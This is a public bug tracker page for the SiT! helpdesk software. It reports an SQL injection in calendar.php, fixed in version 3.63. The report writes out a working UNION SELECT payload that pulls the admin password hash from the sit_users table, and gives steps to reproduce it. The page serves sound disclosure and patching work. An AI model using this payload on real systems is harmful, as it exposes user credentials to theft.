Anonymous | Login | Signup for a new account | 2021-04-17 15:52 BST | ![]() |
Main | My View | View Issues | Change Log | Roadmap |
View Issue Details [ Jump to Notes ] | [ Issue History ] [ Print ] | ||||||||
ID | Project | Category | View Status | Date Submitted | Last Update | ||||
0001395 | SiT! | calendar | public | 2010-09-08 15:28 | 2011-04-16 15:07 | ||||
Reporter | Tomse | ||||||||
Assigned To | paulh | ||||||||
Priority | normal | Severity | major | Reproducibility | unable to reproduce | ||||
Status | closed | Resolution | fixed | ||||||
Platform | OS | OS Version | |||||||
Product Version | 3.62 LTS | ||||||||
Target Version | 3.63 LTS | Fixed in Version | 3.63 LTS | ||||||
Summary | 0001395: possible SQL injection | ||||||||
Description | /calendar.php?display=list&type=1 union all select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sit_users where id=1;-- I was given this line, it should extract the admin hash, I haven't been able to repro it.. | ||||||||
Steps To Reproduce | Login to sit as any user, paste the above URL modified to your system (don't forget the sit_users table) this will list the user admin with the hashed password value in the users field. I've been able to reproduce this, both in the 3.62 and SVN | ||||||||
Tags | security | ||||||||
Attached Files | |||||||||
![]() |
|
kieran (administrator) 2010-09-11 13:44 |
Confirmed here. |
ivan (administrator) 2010-10-09 11:24 |
I can confirm this too |
paulh (administrator) 2010-10-09 11:27 |
yeap I've managed to repro and have a fix almost ready |
paulh (administrator) 2010-10-09 11:32 |
r6693 and 58e5772 resolve this This exploit is only available to authenticated users |
ivan (administrator) 2011-04-16 13:21 |
http://www.autosectools.com/Advisories/Support.Incident.Tracker.3.62_Reflected.Cross-site.Scripting_132.html [^] |
ivan (administrator) 2011-04-16 13:23 |
Magpierss issue fixed in r7110 and Git 5d06e50 |
ivan (administrator) 2011-04-16 15:07 |
Fix Released in 3.63 |
![]() |
|||
Date Modified | Username | Field | Change |
2010-09-08 15:28 | Tomse | New Issue | |
2010-09-11 12:33 | Tomse | Description Updated | View Revisions |
2010-09-11 12:33 | Tomse | Steps to Reproduce Updated | View Revisions |
2010-09-11 12:35 | Tomse | Description Updated | View Revisions |
2010-09-11 13:44 | kieran | Note Added: 0003408 | |
2010-09-11 13:44 | kieran | Assigned To | => kieran |
2010-09-11 13:44 | kieran | Status | new => confirmed |
2010-10-09 11:16 | paulh | Status | confirmed => assigned |
2010-10-09 11:16 | paulh | Assigned To | kieran => paulh |
2010-10-09 11:24 | ivan | Note Added: 0003426 | |
2010-10-09 11:27 | paulh | Note Added: 0003427 | |
2010-10-09 11:32 | paulh | Note Added: 0003428 | |
2010-10-09 11:32 | paulh | Status | assigned => resolved |
2010-10-09 11:32 | paulh | Resolution | open => fixed |
2010-10-09 11:32 | paulh | Fixed in Version | => 3.63 LTS |
2010-10-09 11:32 | paulh | Target Version | => 3.63 LTS |
2010-10-09 11:32 | paulh | Tag Attached: security | |
2011-04-16 13:21 | ivan | Note Added: 0003708 | |
2011-04-16 13:23 | ivan | Note Added: 0003709 | |
2011-04-16 13:23 | ivan | View Status | private => public |
2011-04-16 15:07 | ivan | Note Added: 0003714 | |
2011-04-16 15:07 | ivan | Status | resolved => closed |
Copyright © 2000 - 2021 MantisBT Team |